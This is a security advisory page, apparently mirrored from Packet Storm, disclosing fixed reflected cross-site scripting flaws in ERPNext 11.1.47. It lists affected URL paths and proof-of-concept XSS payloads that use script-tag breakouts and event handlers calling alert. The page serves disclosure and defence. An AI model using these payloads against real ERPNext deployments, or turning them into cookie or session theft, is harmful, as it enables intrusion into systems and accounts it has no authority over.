Lucene search
K

ERPNext 11.1.47 Cross Site Scripting

🗓️ 06 Jan 2020 00:00:00Reported by Daniel BishtawiType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 121 Views

ERPNext 11.1.47 Cross Site Scripting vulnerability fixed by ERPNext on multiple page

Code
`Information  
--------------------  
  
Advisory by Netsparker  
Name: Multiple Reflected Cross-site Scripting Vulnerabilities in ERPNext  
Affected Software: ERPNext  
Affected Versions: 11.1.47  
Vendor Homepage: https://erpnext.com/  
Vulnerability Type: Reflected Cross-site Scripting  
Severity: High  
Status: Fixed  
CVSS Score (3.0): CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N  
Netsparker Advisory Reference: NS-19-017  
  
Technical Details  
--------------------  
  
URL: http://  
{DOMAIN}/address/'"--></style></scRipt><scRipt>alert(‘test’)</scRipt>  
Parameter Type : Full URL  
Parameter Name : URI-BASED  
Attack Pattern : '"--></style></scRipt><scRipt>alert(‘test’)</scRipt>  
  
URL: http://  
{DOMAIN}/addresses/'"--></style></scRipt><scRipt>alert(‘test’)</scRipt>  
Parameter Type : Full URL  
Parameter Name : URI-BASED  
Attack Pattern : '"--></style></scRipt><scRipt>alert(‘test’)</scRipt>  
  
URL: http://{DOMAIN}/blog/"onload="alert(‘test’)" x  
Parameter Type : Full URL  
Parameter Name : URI-BASED  
Attack Pattern : "alert(‘test’)" x  
  
URL: http://  
{DOMAIN}/contact/'"--></style></scRipt><scRipt>alert(‘test’)</scRipt>  
Parameter Type : Full URL  
Parameter Name : URI-BASED  
Attack Pattern : '"--></style></scRipt><scRipt>alert(‘test’)</scRipt>  
  
URL: http://  
{DOMAIN}/project/'"--></style></scRipt><scRipt>alert(‘test’)</scRipt>  
Parameter Type : Full URL  
Parameter Name : URI-BASED  
Attack Pattern : '"--></style></scRipt><scRipt>alert(‘test’)</scRipt>  
  
URL: http://{DOMAIN}/user/[email protected]  
"%20onmouseover=alert(‘test’)%20x="  
Parameter Type : Full URL  
Parameter Name : URI-BASED  
Attack Pattern : x"%20onmouseover=alert(‘test’)%20x="  
  
URL: http://{DOMAIN}/api/method/x"%20onmouseover=alert(‘test’)%20x="  
Parameter Type : Full URL  
Parameter Name : URI-BASED  
Attack Pattern : x"%20onmouseover=alert(‘test’)%20x="  
  
URL: http://{DOMAIN}/api/x"%20onmouseover=alert(‘test’)%20x="  
Parameter Type : Full URL  
Parameter Name : URI-BASED  
Attack Pattern : x"%20onmouseover=alert(‘test’)%20x="  
  
For more information:  
https://www.netsparker.com/web-applications-advisories/ns-19-017-cross-site-scripting-in-erpnext/  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation